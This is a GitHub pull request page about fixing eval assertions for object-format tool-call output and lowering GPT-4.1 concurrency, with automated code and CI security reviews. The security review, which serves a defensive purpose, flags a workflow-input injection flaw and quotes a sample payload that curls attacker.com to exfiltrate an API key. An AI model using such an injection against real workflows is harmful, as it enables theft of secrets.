fix: handle object output in eval assertions and reduce GPT-4.1 concurrency by stack72 · Pull Request #1090 · systeminit/swamp

stack72 · 2026-04-04T01:45:18Z

Summary

Fix eval assertions to handle both string and object output formats from promptfoo — Gemini returns tool calls as objects, not JSON strings, causing all assertions to fail (36.1% pass rate was a false negative; routing was correct but assertions couldn't detect it)
Fix [object Object] in failure log output by serializing object responses before slicing
Reduce GPT-4.1 eval concurrency from 20 to 5 to avoid 429 rate limiting

Test Plan

deno fmt --check passes
deno lint passes
Re-run multi-model eval workflow to verify Gemini pass rate improves and GPT-4.1 avoids rate limits

🤖 Generated with Claude Code

…1 concurrency Promptfoo returns tool call output as objects (not JSON strings) for some providers like Gemini. The JavaScript assertions now handle both string and object output formats. Also reduces GPT-4.1 concurrency from 20 to 5 to avoid 429 rate limiting. Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>

github-actions

Code Review

Blocking Issues

None.

Suggestions

parseInt(args.concurrency) in scripts/eval_skill_triggers_promptfoo.ts:142 doesn't guard against NaN (e.g., --concurrency foo). A quick if (isNaN(concurrency)) check with an error message would be more robust, though this is an internal CI tool with a sensible default so it's non-blocking.

Overall this is a clean, well-scoped fix. The assertion logic correctly handles both string and object output formats from different model providers, the [object Object] log fix is straightforward, and the per-model concurrency in the workflow matrix is a good approach to rate limit management.

github-actions

CI Security Review

Critical / High

None.

Medium

Pre-existing: Expression injection in multi-model-eval.yml:36-37 — ${{ github.event.inputs.models || 'all' }} is interpolated directly in a run: block. A repo collaborator could inject shell commands via the workflow_dispatch input (e.g., "; curl attacker.com/exfil?key=$ANTHROPIC_API_KEY #). This is pre-existing and NOT introduced by this PR, but worth noting. Fix: pass the input via an env: variable instead of inline interpolation.
denoland/setup-deno@v2 not SHA-pinned (multi-model-eval.yml:49) — Pre-existing. The Deno team is a trusted publisher, but SHA-pinning third-party actions is best practice for supply chain security.

Low

None.

Verdict

PASS — The changes in this PR are security-neutral. They add per-model concurrency to the matrix (hardcoded integer values, no injection risk) and fix eval assertion logic in TypeScript files that don't affect CI security posture. The two medium findings are pre-existing and not introduced by this diff.

github-actions bot approved these changes Apr 4, 2026

View reviewed changes

stack72 merged commit b0eb70c into main Apr 4, 2026
11 checks passed

stack72 deleted the fix/eval-assertion-compat branch April 4, 2026 01:52

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

fix: handle object output in eval assertions and reduce GPT-4.1 concurrency#1090

fix: handle object output in eval assertions and reduce GPT-4.1 concurrency#1090
stack72 merged 1 commit intomainfrom
fix/eval-assertion-compat

stack72 commented Apr 4, 2026

Uh oh!

github-actions bot left a comment

Uh oh!

github-actions bot left a comment

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Conversation

stack72 commented Apr 4, 2026

Summary

Test Plan

Uh oh!

github-actions bot left a comment

Choose a reason for hiding this comment

Code Review

Blocking Issues

Suggestions

Uh oh!

github-actions bot left a comment

Choose a reason for hiding this comment

CI Security Review

Critical / High

Medium

Low

Verdict

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant